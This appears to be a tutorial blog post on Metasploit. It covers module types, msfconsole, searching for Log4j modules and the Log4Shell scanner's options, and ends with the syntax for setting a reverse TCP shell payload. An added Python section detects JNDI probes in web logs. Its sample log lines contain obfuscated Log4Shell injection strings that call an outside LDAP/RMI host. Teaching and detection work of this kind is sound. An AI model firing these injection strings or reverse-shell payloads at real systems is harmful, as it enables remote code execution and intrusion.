Metasploit
August 4, 2023 · 7 minute read
Overview
- 1. Exploits: Pre-written pieces of code designed to take advantage of specific vulnerabilities in target systems. Exploits leverage weaknesses to gain unauthorized access or control over the target system.
- 2. Payloads: Pieces of code that are delivered and executed on compromised systems after successful exploitation.
- 3. Encoders: Modules that transform the payload's code without changing its functionality. The main purpose is to obfuscate the payload's content, making it much more difficult for IDS and security tools to identify and block it.
- 4. Auxiliary Modules: Miscellaneous tools and modules that serve various purposes beyond direct exploitation. They encompass a wide variety of functionalities such as network scanning, service enumeration, and more.
Getting Started
──(root㉿kali)-[/home/kali]
└─# msfconsole
=[ metasploit v6.3.27-dev ]
+ -- --=[ 2335 exploits - 1220 auxiliary - 413 post ]
+ -- --=[ 1385 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: You can pivot connections over sessions
started with the ssh_login modules
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
Modules are found with the search keyword. For more information on a module, we can use the info keyword. To use a module, we can either use the use keyword with the module ID, or the use keyword and tab complete the module name. These commands are entered at the msfconsole prompt.
EternalBlue is the codename for a critical software vulnerability in Microsoft's Server Message Block (SMB) protocol. This vulnerability has also been referred to as CVE-2017-0144. It allowed attackers to perform remote code execution (RCE) on vulnerable systems without user interaction.
msf6 > search log4j
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/log4shell_header_injection 2021-12-09 excellent Yes Log4Shell HTTP Header Injection
1 auxiliary/scanner/http/log4shell_scanner 2021-12-09 normal No Log4Shell HTTP Scanner
2 exploit/linux/http/mobileiron_core_log4shell 2021-12-12 excellent Yes MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)
3 exploit/multi/http/ubiquiti_unifi_log4shell 2021-12-09 excellent Yes UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)
Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/ubiquiti_unifi_log4shell
msf6 >
The module we want is an auxiliary module, and the name of the module is log4shell_scanner. We can use info [NAME OF THE MODULE] to ascertain more information about the module.
msf6 > info auxiliary/scanner/http/log4shell_scanner
Name: Log4Shell HTTP Scanner
Module: auxiliary/scanner/http/log4shell_scanner
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2021-12-09
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEADERS_FILE /usr/share/metasploit-framework/data/exploits/CVE-2021-44228/http_headers.txt no File containing headers to check
HTTP_METHOD GET yes The HTTP method to use
LDAP_TIMEOUT 30 yes Time in seconds to wait to receive LDAP connections
LDIF_FILE no Directory LDIF file path
LEAK_PARAMS no Additional parameters to leak, separated by the ^ character (e.g., ${env:USER}^${env:PATH})
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 389 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI to scan
THREADS 1 yes The number of concurrent threads (max one per host)
URIS_FILE /usr/share/metasploit-framework/data/exploits/CVE-2021-44228/http_uris.txt no File containing additional URIs to check
VHOST no HTTP server virtual host
Description:
Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration,
log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.
This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will
trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying
instances that are vulnerable via one of the pre-determined HTTP request injection points. These points include
HTTP headers and the HTTP request path.
Known impacted software includes Apache Struts 2, VMWare VCenter, Apache James, Apache Solr, Apache Druid,
Apache JSPWiki, Apache OFBiz.
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://nvd.nist.gov/vuln/detail/CVE-2021-45046
https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis
https://logging.apache.org/log4j/2.x/security.html
Also known as:
Log4Shell
LogJam
View the full module info with the info -d command.
msf6 >
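The module description above says the scanner plants a JNDI lookup in HTTP headers and the request path and then waits for the LDAP callback. The following added example (mine, not part of the original post or of Metasploit) shows the defender's side of exactly that probe: flagging JNDI lookups in web-server access logs, including the percent-encoded and nested-lookup forms that a naive search for the literal string "${jndi:" misses. The log lines are constructed for the example.

```python
import re
import urllib.parse

# Constructed sample access-log lines for this example (not real traffic). They
# mimic what the log4shell_scanner module sends: a JNDI lookup placed in an
# HTTP header (here User-Agent) and in the request path, plus the two common
# ways the string is disguised: nested Log4j lookups and percent-encoding.
SAMPLE_LOG = r"""
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:389/a}"
10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /${${lower:j}ndi:${::-l}dap://198.51.100.7:389/a} HTTP/1.1" 404 0 "-" "curl/7.81"
10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.81"
""".strip()

# Log4j lookups used to hide the literal "jndi": ${lower:j}, ${upper:j} and the
# default-value form ${anything:-j} all evaluate to "j" inside Log4j.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//?\s*([^}]*)\}", re.IGNORECASE)
_SRC_IP = re.compile(r"^(\S+)")


def normalize(text: str) -> str:
    """Undo percent-encoding and collapse nested lookups until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = urllib.parse.unquote(text)
        text = _CASE_LOOKUP.sub(r"\1", text)
        text = _DEFAULT_LOOKUP.sub(r"\1", text)
    return text


def find_jndi_probes(log_text: str) -> list[dict]:
    """Return one finding per log line that carries a JNDI lookup anywhere in it."""
    findings = []
    for line in log_text.splitlines():
        m = _JNDI.search(normalize(line))
        if not m:
            continue
        ip = _SRC_IP.match(line)
        findings.append({
            "src": ip.group(1) if ip else "?",
            "scheme": m.group(1).lower(),      # ldap, rmi, dns, ...
            "callback": m.group(2).strip(),    # server the victim would contact
        })
    return findings

if __name__ == "__main__":
    for f in find_jndi_probes(SAMPLE_LOG):
        print(f"{f['src']} probed via {f['scheme']} -> {f['callback']}")
```

The callback field is the address the vulnerable host would reach out to, which is what the scanner's SRVHOST/SRVPORT listener waits for, so it is the value worth alerting on and correlating with outbound LDAP or RMI connections.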
Options are configured with the set command. The syntax is as follows: set [OPTION NAME] [VALUE]. We then run exploit to start the module. In this case we didn't have to set up a payload since this is simply a scanning module; however, if we did, we would use the following syntax: set payload [PATH TO PAYLOAD]. For example: set payload windows/x64/shell_reverse_tcp.